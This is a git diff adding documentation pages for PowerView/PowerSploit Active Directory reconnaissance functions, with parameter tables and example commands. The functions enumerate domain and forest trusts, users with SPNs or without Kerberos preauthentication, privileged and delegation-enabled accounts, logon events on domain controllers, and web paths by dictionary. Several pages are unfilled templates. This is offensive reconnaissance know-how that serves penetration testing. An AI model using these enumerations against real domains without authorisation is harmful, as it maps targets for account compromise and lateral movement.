Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Subnet + +Custom PSObject with translated subnet property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainTrust.md b/docs/Recon/Get-DomainTrust.md new file mode 100755 index 00000000..29af5770 --- /dev/null +++ b/docs/Recon/Get-DomainTrust.md @@ -0,0 +1,250 @@ +# Get-DomainTrust + +## SYNOPSIS +{{Fill in the Synopsis}} + +## SYNTAX + +### NET (Default) +``` +Get-DomainTrust [[-Domain] ] [-FindOne] +``` + +### API +``` +Get-DomainTrust [[-Domain] ] [-API] [-Server ] [-FindOne] +``` + +### LDAP +``` +Get-DomainTrust [[-Domain] ] [-LDAP] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-FindOne] [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### Example 1 +``` +PS C:\> {{ Add example code here }} +``` + +{{ Add example description here }} + +## PARAMETERS + +### -API +{{Fill API Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: API +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +{{Fill Credential Description}} + +```yaml +Type: PSCredential +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +{{Fill Domain Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 0 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -FindOne +{{Fill FindOne Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAP +{{Fill LDAP Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +{{Fill LDAPFilter Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +{{Fill Properties Description}} + +```yaml +Type: String[] +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +{{Fill ResultPageSize Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +{{Fill SearchScope Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: +Accepted values: Base, OneLevel, Subtree + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +{{Fill Server Description}} + +```yaml +Type: String +Parameter Sets: API, LDAP +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +{{Fill ServerTimeLimit Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +{{Fill Tombstone Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### System.String + + +## OUTPUTS + +### PowerView.DomainTrust.NET +PowerView.DomainTrust.LDAP +PowerView.DomainTrust.API + + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainTrustMapping.md b/docs/Recon/Get-DomainTrustMapping.md new file mode 100755 index 00000000..692f265c --- /dev/null +++ b/docs/Recon/Get-DomainTrustMapping.md @@ -0,0 +1,220 @@ +# Get-DomainTrustMapping + +## SYNOPSIS +{{Fill in the Synopsis}} + +## SYNTAX + +### NET (Default) +``` +Get-DomainTrustMapping +``` + +### API +``` +Get-DomainTrustMapping [-API] [-Server ] +``` + +### LDAP +``` +Get-DomainTrustMapping [-LDAP] [-LDAPFilter ] [-Properties ] [-SearchBase ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### Example 1 +``` +PS C:\> {{ Add example code here }} +``` + +{{ Add example description here }} + +## PARAMETERS + +### -API +{{Fill API Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: API +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +{{Fill Credential Description}} + +```yaml +Type: PSCredential +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAP +{{Fill LDAP Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +{{Fill LDAPFilter Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +{{Fill Properties Description}} + +```yaml +Type: String[] +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +{{Fill ResultPageSize Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +{{Fill SearchScope Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: +Accepted values: Base, OneLevel, Subtree + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +{{Fill Server Description}} + +```yaml +Type: String +Parameter Sets: API, LDAP +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +{{Fill ServerTimeLimit Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +{{Fill Tombstone Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### None + + +## OUTPUTS + +### PowerView.DomainTrust.NET +PowerView.DomainTrust.LDAP +PowerView.DomainTrust.API + + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainUser.md b/docs/Recon/Get-DomainUser.md new file mode 100755 index 00000000..7247a1d2 --- /dev/null +++ b/docs/Recon/Get-DomainUser.md @@ -0,0 +1,426 @@ +# Get-DomainUser + +## SYNOPSIS +Return all users or specific user objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty + +## SYNTAX + +### AllowDelegation (Default) +``` +Get-DomainUser [[-Identity] ] [-SPN] [-AdminCount] [-AllowDelegation] [-KerberosPreuthNotRequired] + [-Domain ] [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +### DisallowDelegation +``` +Get-DomainUser [[-Identity] ] [-SPN] [-AdminCount] [-DisallowDelegation] [-KerberosPreuthNotRequired] + [-Domain ] [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all user objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainUser -Domain testlab.local +``` + +Return all users for the testlab.local domain + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator" +``` + +Return the user with the given SID, as well as Administrator. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff +``` + +lastlogoff samaccountname +---------- -------------- +12/31/1600 4:00:00 PM dfm.a +12/31/1600 4:00:00 PM dfm +12/31/1600 4:00:00 PM harmj0y +12/31/1600 4:00:00 PM Administrator + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation +``` + +Search the specified OU for privileged user (AdminCount = 1) that allow delegation + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon +``` + +Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon + +### -------------------------- EXAMPLE 6 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUser -Credential $Cred + +### -------------------------- EXAMPLE 7 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +Get-DomainUser dev\user1 -Verbose -Properties distinguishedname +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainUser\] filter string: (&(samAccountType=805306368)(|(samAccountName=user1))) + +distinguishedname +----------------- +CN=user1,CN=Users,DC=dev,DC=testlab,DC=local + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. +Also accepts DOMAIN\user format. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SPN +Switch. +Only return user objects with non-null service principal names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AdminCount +Switch. +Return users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AllowDelegation +Switch. +Return user accounts that are not marked as 'sensitive and not allowed for delegation' + +```yaml +Type: SwitchParameter +Parameter Sets: AllowDelegation +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DisallowDelegation +Switch. +Return user accounts that are marked as 'sensitive and not allowed for delegation' + +```yaml +Type: SwitchParameter +Parameter Sets: DisallowDelegation +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -KerberosPreuthNotRequired +Switch. +Return user accounts with "Do not require Kerberos preauthentication" set. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +## OUTPUTS + +### PowerView.User + +Custom PSObject with translated user property fields. + +PowerView.User.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainUserEvent.md b/docs/Recon/Get-DomainUserEvent.md new file mode 100755 index 00000000..c8449817 --- /dev/null +++ b/docs/Recon/Get-DomainUserEvent.md @@ -0,0 +1,144 @@ +# Get-DomainUserEvent + +## SYNOPSIS +Enumerate account logon events (ID 4624) and Logon with explicit credential +events (ID 4648) from the specified host (default of the localhost). + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-DomainUserEvent [[-ComputerName] ] [-StartTime ] [-EndTime ] + [-MaxEvents ] [-Credential ] +``` + +## DESCRIPTION +This function uses an XML path filter passed to Get-WinEvent to retrieve +security events with IDs of 4624 (logon events) or 4648 (explicit credential +logon events) from -StartTime (default of now-1 day) to -EndTime (default of now). +A maximum of -MaxEvents (default of 5000) are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainUserEvent +``` + +Return logon events on the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3)) +``` + +Return all logon events from the last 3 days from every domain controller in the current domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000 + +Return a max of 1000 logon events from the specified machine using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies the computer name to retrieve events from, default of localhost. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: dnshostname, HostName, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -StartTime +The \[DateTime\] object representing the start of when to collect events. +Default of \[DateTime\]::Now.AddDays(-1). + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now.AddDays(-1) +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -EndTime +The \[DateTime\] object representing the end of when to collect events. +Default of \[DateTime\]::Now. + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -MaxEvents +The maximum number of events to retrieve. +Default of 5000. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 5000 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target computer. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LogonEvent + +PowerView.ExplicitCredentialLogonEvent + +## NOTES + +## RELATED LINKS + +[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/) + diff --git a/docs/Recon/Get-Forest.md b/docs/Recon/Get-Forest.md new file mode 100755 index 00000000..51ddef6e --- /dev/null +++ b/docs/Recon/Get-Forest.md @@ -0,0 +1,80 @@ +# Get-Forest + +## SYNOPSIS +Returns the forest object for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertTo-SID + +## SYNTAX + +``` +Get-Forest [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current +forest or the forest specified with -Forest X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Forest -Forest external.domain +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Forest -Credential $Cred + +## PARAMETERS + +### -Forest +The forest name to query for, defaults to the current forest. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target forest. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Management.Automation.PSCustomObject + +Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition +to the forest root domain SID. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ForestDomain.md b/docs/Recon/Get-ForestDomain.md new file mode 100755 index 00000000..d755c0c8 --- /dev/null +++ b/docs/Recon/Get-ForestDomain.md @@ -0,0 +1,82 @@ +# Get-ForestDomain + +## SYNOPSIS +Return all domains for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +## SYNTAX + +``` +Get-ForestDomain [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +Returns all domains for the current forest or the forest specified +by -Forest X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ForestDomain +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ForestDomain -Forest external.local +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestDomain -Credential $Cred + +## PARAMETERS + +### -Forest +Specifies the forest name to query for domains. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target forest. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.DirectoryServices.ActiveDirectory.Domain + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ForestGlobalCatalog.md b/docs/Recon/Get-ForestGlobalCatalog.md new file mode 100755 index 00000000..c6da4bd5 --- /dev/null +++ b/docs/Recon/Get-ForestGlobalCatalog.md @@ -0,0 +1,78 @@ +# Get-ForestGlobalCatalog + +## SYNOPSIS +Return all global catalogs for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +## SYNTAX + +``` +Get-ForestGlobalCatalog [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +Returns all global catalogs for the current forest or the forest specified +by -Forest X by using Get-Forest to retrieve the specified forest object +and the .FindAllGlobalCatalogs() to enumerate the global catalogs. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ForestGlobalCatalog +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestGlobalCatalog -Credential $Cred + +## PARAMETERS + +### -Forest +Specifies the forest name to query for global catalogs. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.DirectoryServices.ActiveDirectory.GlobalCatalog + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ForestTrust.md b/docs/Recon/Get-ForestTrust.md new file mode 100755 index 00000000..0ff5e3d5 --- /dev/null +++ b/docs/Recon/Get-ForestTrust.md @@ -0,0 +1,91 @@ +# Get-ForestTrust + +## SYNOPSIS +Return all forest trusts for the current forest or a specified forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +## SYNTAX + +``` +Get-ForestTrust [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +This function will enumerate domain trust relationships for the current (or a remote) +forest using number of method using the .NET method GetAllTrustRelationships() on a +System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ForestTrust +``` + +Return current forest trusts. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ForestTrust -Forest "external.local" +``` + +Return trusts for the "external.local" forest. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestTrust -Forest "external.local" -Credential $Cred + +Return trusts for the "external.local" forest using the specified alternate credenitals. + +## PARAMETERS + +### -Forest +Specifies the forest to query for trusts, defaults to the current forest. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods (default). + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-HttpStatus.md b/docs/Recon/Get-HttpStatus.md new file mode 100755 index 00000000..43119830 --- /dev/null +++ b/docs/Recon/Get-HttpStatus.md @@ -0,0 +1,106 @@ +# Get-HttpStatus + +## SYNOPSIS +Returns the HTTP Status Codes and full URL for specified paths. + +PowerSploit Function: Get-HttpStatus +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Get-HttpStatus [-Target] [[-Path] ] [[-Port] ] [-UseSSL] +``` + +## DESCRIPTION +A script to check for the existence of a path or file on a webserver. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*} +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL +``` + +## PARAMETERS + +### -Target +Specifies the remote web host either by IP or hostname. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Path +Specifies the remost host. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: .\Dictionaries\admin.txt +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Port +Specifies the port to connect to. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UseSSL +Use an SSL connection. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error + +## RELATED LINKS + +[http://obscuresecurity.blogspot.com +http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]() + diff --git a/docs/Recon/Get-NetComputerSiteName.md b/docs/Recon/Get-NetComputerSiteName.md new file mode 100755 index 00000000..1a3a964c --- /dev/null +++ b/docs/Recon/Get-NetComputerSiteName.md @@ -0,0 +1,89 @@ +# Get-NetComputerSiteName + +## SYNOPSIS +Returns the AD site where the local (or a remote) machine resides. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetComputerSiteName [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will use the DsGetSiteName Win32API call to look up the +name of the site where a specified computer resides. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local +``` + +Returns the site for WINDOWS1.testlab.local. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainComputer | Get-NetComputerSiteName +``` + +Returns the sites for every machine in AD. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to check the site for (also accepts IP addresses). 